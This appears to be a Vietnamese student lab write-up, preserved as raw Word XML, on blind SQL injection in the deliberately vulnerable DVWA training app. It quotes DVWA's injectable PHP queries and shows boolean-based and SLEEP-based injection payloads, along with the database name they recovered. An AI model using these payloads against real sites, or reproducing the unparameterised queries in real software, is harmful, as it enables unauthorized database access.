          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B110E42" wp14:editId="1FDF54A3">
            <wp:extent cx="5943600" cy="2830830"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="13614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3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C6D" w14:textId="60A771B6" w:rsidR="00F441FC" w:rsidRDefault="00F441FC" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Xác nhận có tồn tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0123524F" w14:textId="5A5783E1" w:rsidR="00F441FC" w:rsidRDefault="002C4EA8" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="002C4EA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A6B2654" wp14:editId="40F95ED4">
            <wp:extent cx="5943600" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4701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2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E9DA" w14:textId="37F3943B" w:rsidR="002C4EA8" w:rsidRDefault="002C4EA8" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp tục với vị trí thứ 2 là chữ ‘v’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0F4119" w14:textId="45D245D1" w:rsidR="002C4EA8" w:rsidRDefault="00E643AF" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00E643AF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ECD2DB5" wp14:editId="22EA9E44">
            <wp:extent cx="5943600" cy="2935605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5746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29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DFF0" w14:textId="62890396" w:rsidR="00E643AF" w:rsidRDefault="00E643AF" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Với chữ ‘w’ ở vị trí thứ 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7781E9ED" w14:textId="282581C5" w:rsidR="00E643AF" w:rsidRDefault="00267E02" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00267E02">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F034EA" wp14:editId="03DE1EA5">
            <wp:extent cx="5943600" cy="2884805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="167808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4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ADA0" w14:textId="0AA16238" w:rsidR="00267E02" w:rsidRDefault="00267E02" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Và cuối cùng là chữ ‘a’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015D00EF" w14:textId="108ED944" w:rsidR="001B5C1E" w:rsidRDefault="001B5C1E" w:rsidP="001B5C1E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Database là ‘dvwa’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E74D524" w14:textId="77777777" w:rsidR="004134E1" w:rsidRPr="002B2670" w:rsidRDefault="004134E1" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6738F94D" w14:textId="24121AF0" w:rsidR="00792F2C" w:rsidRDefault="00792F2C" w:rsidP="0038550A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>II. Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677AC111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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B915D7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if( isset( $_POST[ 'Submit' ]  ) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F87AAB5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Get input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AC8DC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$id = $_POST[ 'id' ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C936E9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$exists = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154039AE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switch ($_DVWA['SQLI_DB']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF19755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case MYSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4790E3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$id = ((isset($GLOBALS["___mysqli_ston"]) &amp;&amp; is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D95C0DC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// Check database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3514889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$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA0749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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34867F52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 = mysqli_query($GLOBALS["___mysqli_ston"],  $query ); // Removed 'or die' to suppress mysql errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF33B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 catch (Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760100B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print "There was an error.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F86A1D7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exit;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFB71BA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0F292187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$exists = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F7E753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if ($result !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C72263B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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02317F6D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$exists = (mysqli_num_rows( $result ) &gt; 0); // The '@' character suppresses errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF231D8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 catch(Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496EFC9E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$exists = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DE1F60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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016687E3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6C1D04A3" w14:textId="50519C94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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3047E3BE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case SQLITE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F8B3A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            global $sqlite_db_connection;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70121B3C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ABC4C3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$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A818F9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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD2E1C7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$results = $sqlite_db_connection-&gt;query($query);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C4731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$row = $results-&gt;fetchArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB3E99B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$row !== false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315D21A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 catch(Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4729ED69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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E85B74D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5AD5DCDD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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5986E698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421CF064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 ($exists) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3F06EA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6BF92FFF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exists in the database.&lt;/pre&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3468B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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A6148A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2F6EEE5E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is MISSING from the database.&lt;/pre&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB45C5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24706432" w14:textId="77777777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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E708FFB" w14:textId="23DC2A5B" w:rsidR="004134E1" w:rsidRDefault="004134E1" w:rsidP="004134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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E23601" w14:textId="63B3B668" w:rsidR="007E46D5" w:rsidRPr="007E46D5" w:rsidRDefault="00093320" w:rsidP="007E46D5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Level này sử dụng nút thả xuống để chọn ID user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A427DC1" w14:textId="642583BF" w:rsidR="004134E1" w:rsidRDefault="004134E1" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="004134E1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E3C27D5" wp14:editId="7E21E63A">
            <wp:extent cx="5943600" cy="2938780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18592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1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8949" w14:textId="33B813A3" w:rsidR="00093320" w:rsidRDefault="00093320" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Với $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160279F8" w14:textId="16359C0E" w:rsidR="00093320" w:rsidRDefault="00451BD1" w:rsidP="00451BD1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00451BD1">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Boolean-based Blind SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5603AAA7" w14:textId="066ECCCC" w:rsidR="00451BD1" w:rsidRDefault="00451BD1" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Tôi sử dụng Burp Repeater để chạy và thay đổi id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D38A41" w14:textId="7A697C75" w:rsidR="00451BD1" w:rsidRDefault="00451BD1" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00451BD1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BD8892B" wp14:editId="53352459">
            <wp:extent cx="5943600" cy="2194560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16467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3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F540" w14:textId="0B54A4FE" w:rsidR="00451BD1" w:rsidRDefault="00451BD1" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Với </w:t>
      </w:r>
      <w:r w:rsidR="00444053">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>id=1 AND 1=1</w:t>
      </w:r>
      <w:r w:rsidR="00444053">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thì tồn tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266E0C3" w14:textId="4A2DEF9C" w:rsidR="00444053" w:rsidRDefault="00444053" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00444053">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F4E0531" wp14:editId="783DA8AA">
            <wp:extent cx="5943600" cy="3333115"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="105256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63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BBD6" w14:textId="6729AACA" w:rsidR="00444053" w:rsidRDefault="00444053" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Với “id=1 AND 1=2” thì không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CADFE76" w14:textId="77777777" w:rsidR="00144E09" w:rsidRDefault="00144E09" w:rsidP="00144E09">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7716587E" wp14:editId="2F4DE06C">
            <wp:extent cx="5943600" cy="2922270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17499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0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C4D0" w14:textId="77777777" w:rsidR="00144E09" w:rsidRPr="004134E1" w:rsidRDefault="00144E09" w:rsidP="00144E09">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả cho id=1 AND LENGTH(DATABASE())=4 Vẫn hiện là exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C40EEF5" w14:textId="77777777" w:rsidR="00444053" w:rsidRDefault="00444053" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232DD3E8" w14:textId="784E531A" w:rsidR="00A31685" w:rsidRDefault="00A31685" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>2. Time-error Blind SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0D343D" w14:textId="77777777" w:rsidR="00A31685" w:rsidRDefault="00A31685" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DDD439E" w14:textId="4D8D162B" w:rsidR="00A31685" w:rsidRDefault="00A31685" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Với </w:t>
      </w:r>
      <w:r w:rsidRPr="00A31685">
        <w:t xml:space="preserve">“id=1 AND </w:t>
      </w:r>
      <w:r>
        <w:t>SLEEP(5)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31685">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26861FA4" w14:textId="40CE4A14" w:rsidR="00A31685" w:rsidRDefault="00A31685" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A31685">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44FCB2B6" wp14:editId="2F59BB7B">
            <wp:extent cx="5943600" cy="2905125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="9162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7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026F" w14:textId="51A1E297" w:rsidR="00A31685" w:rsidRDefault="00A31685" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Thì server đã ngủ trong hơn 5s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CC806" w14:textId="12AA3AD5" w:rsidR="00A31685" w:rsidRDefault="00A31685" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A31685">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="279FAA1D" wp14:editId="2DF9FE2C">
            <wp:extent cx="5943600" cy="2936240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18004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8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794A" w14:textId="50C4728E" w:rsidR="00A31685" w:rsidRDefault="00A31685" w:rsidP="004134E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp tục thử với SLEEP(10) thì đúng thật server đã ngủ 11s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015D8A11" w14:textId="75D9DAFA" w:rsidR="002903DB" w:rsidRDefault="006C1F08" w:rsidP="00646930">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>III. High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B1B6B0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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D9DB9B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if( isset( $_COOKIE[ 'id' ] ) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECA991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Get input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D608BCF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$id = $_COOKIE[ 'id' ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE0465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$exists = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF70F6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switch ($_DVWA['SQLI_DB']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2317A17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case MYSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9A1630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// Check database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5225FA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$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5087A8EF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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F68ACBE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 = mysqli_query($GLOBALS["___mysqli_ston"],  $query ); // Removed 'or die' to suppress mysql errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB7DFA5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 catch (Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420BA910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 = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5461A8D9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680E48DF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$exists = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E7638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if ($result !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DA08B3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// Get results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578CAA5F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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70D534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$exists = (mysqli_num_rows( $result ) &gt; 0); // The '@' character suppresses errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B00BC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 catch(Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC17E22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$exists = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73109CD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5DD0AD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0DFEA26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((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA9BDE8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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E761B9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case SQLITE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459CB42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global $sqlite_db_connection;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B8DE24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7A2EE2F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$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C6206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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D6073B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $results = $sqlite_db_connection-&gt;query($query);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E026FE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$row = $results-&gt;fetchArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D44BFD5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$row !== false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418014E3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 catch(Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AE1F61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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6C10D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A9F3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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AE2FD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34107BD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 ($exists) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776BB7CD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7A77255C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exists in the database.&lt;/pre&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E13E38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271CD7AA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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A6F20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Might sleep a random amount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D5D45A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if( rand( 0, 5 ) == 3 ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53403D3D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sleep( rand( 2, 4 ) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A1E02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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8688FF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User wasn't found, so the page wasn't!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A426645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header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52992B87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5927C138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is MISSING from the database.&lt;/pre&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652C5FC0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726243DB" w14:textId="77777777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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD5613" w14:textId="1C33D80A" w:rsidR="004E4168" w:rsidRDefault="004E4168" w:rsidP="004E41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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF81328" w14:textId="26047A63" w:rsidR="004E4168" w:rsidRDefault="004E4168" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394E6929" w14:textId="01FE1164" w:rsidR="00F57EAD" w:rsidRPr="004E4168" w:rsidRDefault="00F57EAD" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ở level high này cũng giống như bài level high ở challenge standard SQLi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C243EF" w14:textId="56DCE218" w:rsidR="004E4168" w:rsidRDefault="004E4168" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="004E4168">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72DA9F23" wp14:editId="32C48A98">
            <wp:extent cx="5943600" cy="2908300"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="19646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46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A8FB" w14:textId="4F999244" w:rsidR="00F57EAD" w:rsidRDefault="00F57EAD" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Ở đây chức năng cũng sử dụng cửa sổ pop-up để nhập ID và hiển thị User ID tồn tại trong database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E200B" w14:textId="77777777" w:rsidR="00DE6A97" w:rsidRDefault="00DE6A97" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4897E177" w14:textId="562C630D" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE0D073" w14:textId="32D6CE0B" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="00B83B1A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83B1A">
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Test boolean-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E95159" w14:textId="4F496169" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="00B83B1A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Với id=1’ AND 1=1# &gt; exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2D843E" w14:textId="7597A2DC" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="00B83B1A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83B1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="554FC157" wp14:editId="72041CBC">
            <wp:extent cx="5943600" cy="2978150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1939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D39B" w14:textId="21E046E4" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="00B83B1A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Và id=1’ AND 1=2# &gt; missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E847F82" w14:textId="29462527" w:rsidR="00DE6A97" w:rsidRDefault="00B83B1A" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83B1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="030C0AA9" wp14:editId="330440E2">
            <wp:extent cx="5943600" cy="2982595"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="70285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2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E686" w14:textId="575C288C" w:rsidR="00F57EAD" w:rsidRDefault="00B83B1A" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Boolean blind sqli hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C77C77" w14:textId="77777777" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39BF60CC" w14:textId="65F50FE7" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>2. Test error-time based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530CE0B3" w14:textId="77777777" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3330EB99" w14:textId="54CBD6CB" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Với id=1’ AND SLEEP(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C42CAC" w14:textId="33FB6552" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83B1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E6AD5C0" wp14:editId="0ED4F5A8">
            <wp:extent cx="5943600" cy="3122295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="602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7AF6" w14:textId="244786A1" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Trang web đã ngủ trong 5s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814CBA6" w14:textId="4EA41B85" w:rsidR="00B83B1A" w:rsidRDefault="00B83B1A" w:rsidP="004E4168">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83B1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08C0A1E0" wp14:editId="3CF8A4A8">
            <wp:extent cx="5943600" cy="2992120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
